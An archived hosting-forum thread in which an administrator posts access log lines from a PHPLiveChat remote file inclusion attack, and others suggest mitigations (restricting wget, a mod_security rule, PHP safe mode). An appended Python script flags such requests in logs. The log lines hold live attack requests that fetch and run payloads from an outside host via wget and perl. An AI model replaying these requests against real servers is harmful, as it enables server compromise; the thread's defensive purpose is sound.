Web Hosting Talk

View Full Version : PHPLiveChat - Security Hole


mainarea
08-03-2004, 02:18 PM
200.138.208.43 - - [30/Jul/2004:00:23:06 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;wget%20www.excs.hpg.ig.com.br/bbb HTTP/1.1" 200 580 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [30/Jul/2004:00:23:50 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;wget%20www.excs.hpg.ig.com.br/bnc.conf HTTP/1.1" 200 591 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [30/Jul/2004:00:24:09 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;perl%20bbb HTTP/1.1" 200 62 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [02/Aug/2004:17:38:42 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=uname%20-a HTTP/1.1" 200 185 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.138.208.43 - - [02/Aug/2004:17:39:07 -0400] "GET /asp/tracker.php?uid=0&action=initst&Uid=http://www.excs.hpg.ig.com.br/barbie.txt?&cmd=cd%20/var/tmp/;wget%20www.excs.hpg.ig.com.br/lol.txt HTTP/1.1" 200 588 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


One of my clients just got hacked like that. Is there any way to close that security bug in PHPLiveChat? Any way to block those kinds of requests using mod_rewrite or something temporarily (like blocking "wget" in URLs)?

- Matt

eth00
08-03-2004, 02:23 PM
You could chmod wget so it cannot be accessed by anyone other than root or wheel users. Mod_security also comes to mind with a single rule blocking wget.

mainarea
08-03-2004, 02:29 PM
Chmod'ing wget seems like the best plan right now; that's what I just did.

Thanks,

Matt

rsferreira
08-03-2004, 03:21 PM
We use PHP with safe mode on, and it has already proven to be an excellent measure for shared hosting, as you can't control what kind of scripts users will be running.

It will affect some legit scripts, but, at least for us, the advantages brought by safe mode are far more relevant than the problems with one script or another.

tripod_abe
08-03-2004, 07:21 PM
Thanks for the httpd log :). PHP Live should take measures for that.
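
A detection sketch for the request pattern in the log lines at the top of this thread, added here as an example and not part of any poster's message or of PHPLiveChat: it flags requests in an Apache combined-format access log where a query parameter's value is a URL or contains a shell command name. The sample lines, client addresses and host names are constructed, and the command word list is an assumption to tune per site.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache combined log format: client, ident, user, [time], "METHOD target proto", status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')
# A parameter whose decoded value is itself a URL is the remote-include indicator.
URL_VALUE = re.compile(r'^(?:https?|ftp)://', re.I)
# Assumed word list: the commands visible in the thread's log plus similar tools.
SHELL_WORDS = re.compile(r'\b(?:wget|curl|perl|uname|fetch|lynx)\b', re.I)

# Constructed sample lines (documentation addresses, .invalid host names).
SAMPLE = [
    '192.0.2.10 - - [30/Jul/2004:00:23:06 -0400] "GET /asp/tracker.php?uid=0&action=initst'
    '&Uid=http://files.example.invalid/x.txt?&cmd=cd%20/var/tmp/;wget%20files.example.invalid/y'
    ' HTTP/1.1" 200 580 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [30/Jul/2004:00:25:00 -0400] "GET /asp/tracker.php?uid=0'
    '&Uid=http%3A%2F%2Ffiles.example.invalid%2Fx.txt HTTP/1.1" 200 62 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [30/Jul/2004:00:26:00 -0400] "GET /asp/tracker.php?uid=0&action=initst'
    ' HTTP/1.1" 200 91 "-" "Mozilla/4.0"',
]

def inspect(line):
    """Return a finding dict for a suspicious request, or None for clean/unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, when, _method, target, status, _size = m.groups()
    parts = urlsplit(target)
    reasons = []
    # Split on '&' only: the ';' inside cmd= is part of the value, not a separator.
    for pair in parts.query.split('&'):
        name, _, raw = pair.partition('=')
        value = unquote_plus(raw)  # decode first so %-encoded URLs are caught too
        if URL_VALUE.match(value):
            reasons.append(f"url-valued parameter {name}")
        if SHELL_WORDS.search(value):
            reasons.append(f"shell command in parameter {name}")
    if not reasons:
        return None
    # Status 200 means the request was served rather than rejected.
    return {"client": client, "time": when, "path": parts.path,
            "status": int(status), "reasons": reasons}

def scan(lines):
    """Run inspect() over an iterable of log lines and keep only the findings."""
    return [f for f in map(inspect, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

To check a real log, pass an open file handle to `scan()`; URL-valued parameters can be legitimate (redirect targets, for instance), so review findings per script path before turning the pattern into a blocking rule.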